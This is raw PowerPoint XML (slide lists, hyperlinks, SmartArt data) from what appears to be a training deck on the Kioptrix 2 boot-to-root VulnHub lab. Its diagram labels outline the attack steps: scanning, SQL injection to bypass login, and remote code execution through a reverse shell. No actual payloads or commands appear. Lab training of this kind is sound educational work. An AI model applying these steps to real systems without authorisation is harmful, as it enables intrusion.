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9" r:id="rId3"/>
    <p:sldId id="287" r:id="rId4"/>
    <p:sldId id="271" r:id="rId5"/>
    <p:sldId id="261" r:id="rId6"/>
    <p:sldId id="272" r:id="rId7"/>
    <p:sldId id="288" r:id="rId8"/>
    <p:sldId id="273" r:id="rId9"/>
    <p:sldId id="274" r:id="rId10"/>
    <p:sldId id="289" r:id="rId11"/>
    <p:sldId id="282" r:id="rId12"/>
    <p:sldId id="263" r:id="rId13"/>
    <p:sldId id="277" r:id="rId14"/>
    <p:sldId id="276" r:id="rId15"/>
    <p:sldId id="278" r:id="rId16"/>
    <p:sldId id="279" r:id="rId17"/>
    <p:sldId id="280" r:id="rId18"/>
    <p:sldId id="290" r:id="rId19"/>
    <p:sldId id="283" r:id="rId20"/>
    <p:sldId id="281" r:id="rId21"/>
    <p:sldId id="284" r:id="rId22"/>
    <p:sldId id="285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13F93D-3B5F-4B6C-84B8-61C3D8DEE74F}">
          <p14:sldIdLst>
            <p14:sldId id="291"/>
            <p14:sldId id="259"/>
            <p14:sldId id="287"/>
            <p14:sldId id="271"/>
            <p14:sldId id="261"/>
            <p14:sldId id="272"/>
            <p14:sldId id="288"/>
            <p14:sldId id="273"/>
            <p14:sldId id="274"/>
            <p14:sldId id="289"/>
            <p14:sldId id="282"/>
            <p14:sldId id="263"/>
            <p14:sldId id="277"/>
            <p14:sldId id="276"/>
            <p14:sldId id="278"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Untitled Section" id="{5FC12435-B6F9-4056-A870-8F67869AB421}">
          <p14:sldIdLst>
            <p14:sldId id="279"/>
            <p14:sldId id="280"/>
            <p14:sldId id="290"/>
            <p14:sldId id="283"/>
            <p14:sldId id="281"/>
            <p14:sldId id="284"/>
            <p14:sldId id="285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ulnhub.com/entry/kioptrix-level-11-2,23/" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.kioptrix.com/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isoiec-27001-information-security.html" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.pcisecuritystandards.org/" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.nist.gov/publications/guide-general-server-security" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/About_The_Open_Web_Application_Security_Project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ulnhub.com/entry/kioptrix-level-11-2,23/" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.kioptrix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3193B-6909-48AD-8DB1-4A2285ABEA4D}" type="doc">
      <dgm:prSet loTypeId="urn:microsoft.com/office/officeart/2005/8/layout/vList5" loCatId="Inbox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B2E5388-BAAA-4012-BA1D-E5BFD6399588}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Author/Series</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A1CA12E1-CA72-4F03-8324-865B6C5EB2A5}" type="parTrans" cxnId="{32023ABA-F020-46C0-B5BB-3E65320CBD96}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5A4ED7D7-90D5-4084-8FD1-E9FA7C023A3A}" type="sibTrans" cxnId="{32023ABA-F020-46C0-B5BB-3E65320CBD96}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0082DAD5-EA66-436C-9525-E52D6F7FA8AF}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" err="1"/>
            <a:t>Kioptrix</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A7AF0029-6CE9-4291-AEB9-BB3D74B5064E}" type="parTrans" cxnId="{4AC1B92B-A949-4F18-94D9-57EEC659871A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C3A3D2C3-92CF-45B7-A159-B80CFBBC9398}" type="sibTrans" cxnId="{4AC1B92B-A949-4F18-94D9-57EEC659871A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9C6AE461-394F-4D54-9061-A29D09ABBB29}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Webpage</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E4981BD9-A151-47A4-B0A0-1ED3BBE5E38A}" type="parTrans" cxnId="{3DED6783-986E-44F9-9D1E-88C38E6B5C60}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{083D1DA3-6AB2-469D-8D9D-F7AEE05BEF82}" type="sibTrans" cxnId="{3DED6783-986E-44F9-9D1E-88C38E6B5C60}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9EE05C4D-F2AE-4163-AD51-A65678CB5073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Kioptrix Homepage</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FE1700B3-D5AF-4700-8DA1-72CBC87BDCFE}" type="parTrans" cxnId="{3410665B-9C99-4EA3-AE4E-07C8C8FB7F26}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C21C642C-2885-4B44-851F-1491FAA5C974}" type="sibTrans" cxnId="{3410665B-9C99-4EA3-AE4E-07C8C8FB7F26}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5C316301-3AE5-47AF-A1D3-07FA7E23A356}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" err="1">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId2"/>
            </a:rPr>
            <a:t>Vulnhub</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" dirty="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId2"/>
            </a:rPr>
            <a:t> Location</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8896EDB2-AF0E-4D28-BF1E-B332BF4D9BA2}" type="parTrans" cxnId="{0DED38B3-E6EB-42C6-B483-5448A3A0AA09}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E746511F-9043-4FBA-8D03-9A9CDEE2D2B7}" type="sibTrans" cxnId="{0DED38B3-E6EB-42C6-B483-5448A3A0AA09}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A5DE295D-A608-4054-B954-2B45063CED49}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>Purpose</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{319E5D75-C8F7-4175-ABC6-5AB87E559612}" type="parTrans" cxnId="{D0E9F9C8-79AA-4855-93AE-2A3C4A1E245F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A139621D-30B9-4864-AF4C-537743D8B9A6}" type="sibTrans" cxnId="{D0E9F9C8-79AA-4855-93AE-2A3C4A1E245F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8761B1AD-93BE-4DED-9B7E-651C7EB22BAE}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>“Boot to root” </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>image for training and fun</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B0AA49F6-33AD-4B9B-BF94-25A4455DEE48}" type="parTrans" cxnId="{B7431622-AE27-4A32-8A7D-09A03334CFB6}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{80A9E7A0-765A-4CA3-B275-38C1960C38BF}" type="sibTrans" cxnId="{B7431622-AE27-4A32-8A7D-09A03334CFB6}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{615E33B8-3DB5-4928-BFB1-788122F12516}" type="pres">
      <dgm:prSet presAssocID="{3173193B-6909-48AD-8DB1-4A2285ABEA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DEFD85-5186-4F1F-A6F0-91ACC6B9B49F}" type="pres">
      <dgm:prSet presAssocID="{EB2E5388-BAAA-4012-BA1D-E5BFD6399588}" presName="linNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D6EA24D2-D007-4DA2-B2E9-89642914AEB0}" type="pres">
      <dgm:prSet presAssocID="{EB2E5388-BAAA-4012-BA1D-E5BFD639958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4CECC-1F65-4099-A139-F4D80312019E}" type="pres">
      <dgm:prSet presAssocID="{EB2E5388-BAAA-4012-BA1D-E5BFD639958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79018-FAF9-4701-AC22-05A56FA03478}" type="pres">
      <dgm:prSet presAssocID="{5A4ED7D7-90D5-4084-8FD1-E9FA7C023A3A}" presName="sp" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{8BDDF299-05DC-4AB8-91A1-769E22C2C05A}" type="pres">
      <dgm:prSet presAssocID="{9C6AE461-394F-4D54-9061-A29D09ABBB29}" presName="linNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C26DF289-C46D-41DC-8707-F606F112E873}" type="pres">
      <dgm:prSet presAssocID="{9C6AE461-394F-4D54-9061-A29D09ABBB2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AE799-EF59-43CE-B61C-F4F338685460}" type="pres">
      <dgm:prSet presAssocID="{9C6AE461-394F-4D54-9061-A29D09ABBB2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1422C-37E7-4B58-B12D-586136DE85D2}" type="pres">
      <dgm:prSet presAssocID="{083D1DA3-6AB2-469D-8D9D-F7AEE05BEF82}" presName="sp" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A0217FC7-031B-41B8-9529-C4A361033209}" type="pres">
      <dgm:prSet presAssocID="{A5DE295D-A608-4054-B954-2B45063CED49}" presName="linNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B148144A-EB97-4ACE-9F2B-17B116249638}" type="pres">
      <dgm:prSet presAssocID="{A5DE295D-A608-4054-B954-2B45063CED4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206555-98BB-42A2-BCF1-793B0D6E2372}" type="pres">
      <dgm:prSet presAssocID="{A5DE295D-A608-4054-B954-2B45063CED4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E9F9C8-79AA-4855-93AE-2A3C4A1E245F}" srcId="{3173193B-6909-48AD-8DB1-4A2285ABEA4D}" destId="{A5DE295D-A608-4054-B954-2B45063CED49}" srcOrd="2" destOrd="0" parTransId="{319E5D75-C8F7-4175-ABC6-5AB87E559612}" sibTransId="{A139621D-30B9-4864-AF4C-537743D8B9A6}"/>
    <dgm:cxn modelId="{71F8D7AC-EDEB-4447-92FD-4C025A2AC32F}" type="presOf" srcId="{3173193B-6909-48AD-8DB1-4A2285ABEA4D}" destId="{615E33B8-3DB5-4928-BFB1-788122F12516}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{3410665B-9C99-4EA3-AE4E-07C8C8FB7F26}" srcId="{9C6AE461-394F-4D54-9061-A29D09ABBB29}" destId="{9EE05C4D-F2AE-4163-AD51-A65678CB5073}" srcOrd="0" destOrd="0" parTransId="{FE1700B3-D5AF-4700-8DA1-72CBC87BDCFE}" sibTransId="{C21C642C-2885-4B44-851F-1491FAA5C974}"/>
    <dgm:cxn modelId="{0DED38B3-E6EB-42C6-B483-5448A3A0AA09}" srcId="{9C6AE461-394F-4D54-9061-A29D09ABBB29}" destId="{5C316301-3AE5-47AF-A1D3-07FA7E23A356}" srcOrd="1" destOrd="0" parTransId="{8896EDB2-AF0E-4D28-BF1E-B332BF4D9BA2}" sibTransId="{E746511F-9043-4FBA-8D03-9A9CDEE2D2B7}"/>
    <dgm:cxn modelId="{12BB6F65-292D-4A20-97BB-C080A784A331}" type="presOf" srcId="{A5DE295D-A608-4054-B954-2B45063CED49}" destId="{B148144A-EB97-4ACE-9F2B-17B116249638}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{32023ABA-F020-46C0-B5BB-3E65320CBD96}" srcId="{3173193B-6909-48AD-8DB1-4A2285ABEA4D}" destId="{EB2E5388-BAAA-4012-BA1D-E5BFD6399588}" srcOrd="0" destOrd="0" parTransId="{A1CA12E1-CA72-4F03-8324-865B6C5EB2A5}" sibTransId="{5A4ED7D7-90D5-4084-8FD1-E9FA7C023A3A}"/>
    <dgm:cxn modelId="{4AC1B92B-A949-4F18-94D9-57EEC659871A}" srcId="{EB2E5388-BAAA-4012-BA1D-E5BFD6399588}" destId="{0082DAD5-EA66-436C-9525-E52D6F7FA8AF}" srcOrd="0" destOrd="0" parTransId="{A7AF0029-6CE9-4291-AEB9-BB3D74B5064E}" sibTransId="{C3A3D2C3-92CF-45B7-A159-B80CFBBC9398}"/>
    <dgm:cxn modelId="{203370AE-DAEA-4DED-A2AE-17C4B8B94468}" type="presOf" srcId="{8761B1AD-93BE-4DED-9B7E-651C7EB22BAE}" destId="{57206555-98BB-42A2-BCF1-793B0D6E2372}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{1097B3AD-7B76-4D8E-9AFD-665BAEE6D13E}" type="presOf" srcId="{0082DAD5-EA66-436C-9525-E52D6F7FA8AF}" destId="{0CA4CECC-1F65-4099-A139-F4D80312019E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{F7F6FBC2-5612-4849-9971-EAF456D70CE0}" type="presOf" srcId="{5C316301-3AE5-47AF-A1D3-07FA7E23A356}" destId="{774AE799-EF59-43CE-B61C-F4F338685460}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{0FA5B850-6383-403F-9DD4-B6703DB96C07}" type="presOf" srcId="{9EE05C4D-F2AE-4163-AD51-A65678CB5073}" destId="{774AE799-EF59-43CE-B61C-F4F338685460}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{126FAFB0-A590-4E43-8CD7-4FB2AA037BC9}" type="presOf" srcId="{EB2E5388-BAAA-4012-BA1D-E5BFD6399588}" destId="{D6EA24D2-D007-4DA2-B2E9-89642914AEB0}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{397E4FC1-AD3B-4667-B20E-D6B909EB7AC3}" type="presOf" srcId="{9C6AE461-394F-4D54-9061-A29D09ABBB29}" destId="{C26DF289-C46D-41DC-8707-F606F112E873}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{3DED6783-986E-44F9-9D1E-88C38E6B5C60}" srcId="{3173193B-6909-48AD-8DB1-4A2285ABEA4D}" destId="{9C6AE461-394F-4D54-9061-A29D09ABBB29}" srcOrd="1" destOrd="0" parTransId="{E4981BD9-A151-47A4-B0A0-1ED3BBE5E38A}" sibTransId="{083D1DA3-6AB2-469D-8D9D-F7AEE05BEF82}"/>
    <dgm:cxn modelId="{B7431622-AE27-4A32-8A7D-09A03334CFB6}" srcId="{A5DE295D-A608-4054-B954-2B45063CED49}" destId="{8761B1AD-93BE-4DED-9B7E-651C7EB22BAE}" srcOrd="0" destOrd="0" parTransId="{B0AA49F6-33AD-4B9B-BF94-25A4455DEE48}" sibTransId="{80A9E7A0-765A-4CA3-B275-38C1960C38BF}"/>
    <dgm:cxn modelId="{45B0CF76-F6B3-435F-AE39-92A5B2F80E5B}" type="presParOf" srcId="{615E33B8-3DB5-4928-BFB1-788122F12516}" destId="{97DEFD85-5186-4F1F-A6F0-91ACC6B9B49F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{F7F3AB84-DB50-4BFA-A13C-42DF99E45DF5}" type="presParOf" srcId="{97DEFD85-5186-4F1F-A6F0-91ACC6B9B49F}" destId="{D6EA24D2-D007-4DA2-B2E9-89642914AEB0}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{EC5518E4-BE98-43D0-A73A-0E5B5177DF51}" type="presParOf" srcId="{97DEFD85-5186-4F1F-A6F0-91ACC6B9B49F}" destId="{0CA4CECC-1F65-4099-A139-F4D80312019E}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{687C8F30-87C6-4AC5-B842-8EA1DA956090}" type="presParOf" srcId="{615E33B8-3DB5-4928-BFB1-788122F12516}" destId="{7E779018-FAF9-4701-AC22-05A56FA03478}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{3C46FF3A-256B-4F5D-96FB-BB25374CC413}" type="presParOf" srcId="{615E33B8-3DB5-4928-BFB1-788122F12516}" destId="{8BDDF299-05DC-4AB8-91A1-769E22C2C05A}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{8ACB4CC9-AC6C-4847-80BC-4002C49C57D9}" type="presParOf" srcId="{8BDDF299-05DC-4AB8-91A1-769E22C2C05A}" destId="{C26DF289-C46D-41DC-8707-F606F112E873}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{3033F4D1-A475-4958-BD67-77A32A6CC745}" type="presParOf" srcId="{8BDDF299-05DC-4AB8-91A1-769E22C2C05A}" destId="{774AE799-EF59-43CE-B61C-F4F338685460}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{00D74E49-8B34-47CE-8DD4-ADD28583D66A}" type="presParOf" srcId="{615E33B8-3DB5-4928-BFB1-788122F12516}" destId="{AAE1422C-37E7-4B58-B12D-586136DE85D2}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{DBD4F029-E830-483E-9F02-0CB208EB391F}" type="presParOf" srcId="{615E33B8-3DB5-4928-BFB1-788122F12516}" destId="{A0217FC7-031B-41B8-9529-C4A361033209}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{16B66A28-5E52-4E00-862F-83E92660D70F}" type="presParOf" srcId="{A0217FC7-031B-41B8-9529-C4A361033209}" destId="{B148144A-EB97-4ACE-9F2B-17B116249638}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{3EE89389-4DE6-40BC-A4E8-10EB03FE5A2C}" type="presParOf" srcId="{A0217FC7-031B-41B8-9529-C4A361033209}" destId="{57206555-98BB-42A2-BCF1-793B0D6E23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E32E2D-E8BA-41A9-BDD5-89E1D9B7DE2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F0606F-8C5D-42DA-8D4F-F16D28DC0DCD}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="1" dirty="0"/>
            <a:t>Attacker</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4ADF41B5-77F6-4A72-887A-7C15DCBC71F4}" type="parTrans" cxnId="{DC582E33-C06B-4258-B406-9BFB11A30AFD}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{600EF39F-CAA4-4F0C-874D-07CA789E448A}" type="sibTrans" cxnId="{DC582E33-C06B-4258-B406-9BFB11A30AFD}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0531A41C-12B8-46E2-A9EB-70B4F7925457}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Scan Target Machine</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E7155650-067E-4DBF-8911-FF55A4A048E1}" type="parTrans" cxnId="{5B26D4BE-EC7F-464E-9B09-5559D370844E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AB046912-045E-41D5-A9F4-4C854CA29781}" type="sibTrans" cxnId="{5B26D4BE-EC7F-464E-9B09-5559D370844E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9895992A-28CB-4D87-BBEA-FB64FA34D091}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="1" dirty="0"/>
            <a:t>Website – Login Page</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{21FF7AAA-8E3E-4986-BACA-912B03FD200A}" type="parTrans" cxnId="{B7ABFC2E-CEC0-4A50-8E44-1CB6CC6B6911}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{23AECCFA-8D73-4E81-BD57-53635E9A3D55}" type="sibTrans" cxnId="{B7ABFC2E-CEC0-4A50-8E44-1CB6CC6B6911}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B744E046-40A9-417D-90CD-5F16FDF30B42}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>SQL Injection – Bypass Authentication</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2B8F60DF-C0AD-49FE-A76B-138C88360FD3}" type="parTrans" cxnId="{272523AA-14E5-4138-8680-C3B52B3E4A61}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{EE329873-B376-4637-8783-B9317B377A49}" type="sibTrans" cxnId="{272523AA-14E5-4138-8680-C3B52B3E4A61}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{63D11F23-65FA-4010-B9DC-98834F39C69E}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="1" dirty="0"/>
            <a:t>Internal Application</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F6E5A335-0371-4BCA-84D2-539CC4CFBDCC}" type="parTrans" cxnId="{0F1E8445-6580-45BD-A5C9-C06EDE53E27B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{772CCF14-886D-4D18-937A-37EBAAE9C282}" type="sibTrans" cxnId="{0F1E8445-6580-45BD-A5C9-C06EDE53E27B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C70DB3D5-AB93-4071-B215-289C9782ADD2}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Remote Code Execution – Reverse Shell</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F23D86C0-4C78-4B3A-B813-066081319478}" type="parTrans" cxnId="{3E532744-6B5A-449B-B0D6-977739897DBC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{66F2555F-55F6-4869-A5B3-A636A5C2A8AC}" type="sibTrans" cxnId="{3E532744-6B5A-449B-B0D6-977739897DBC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
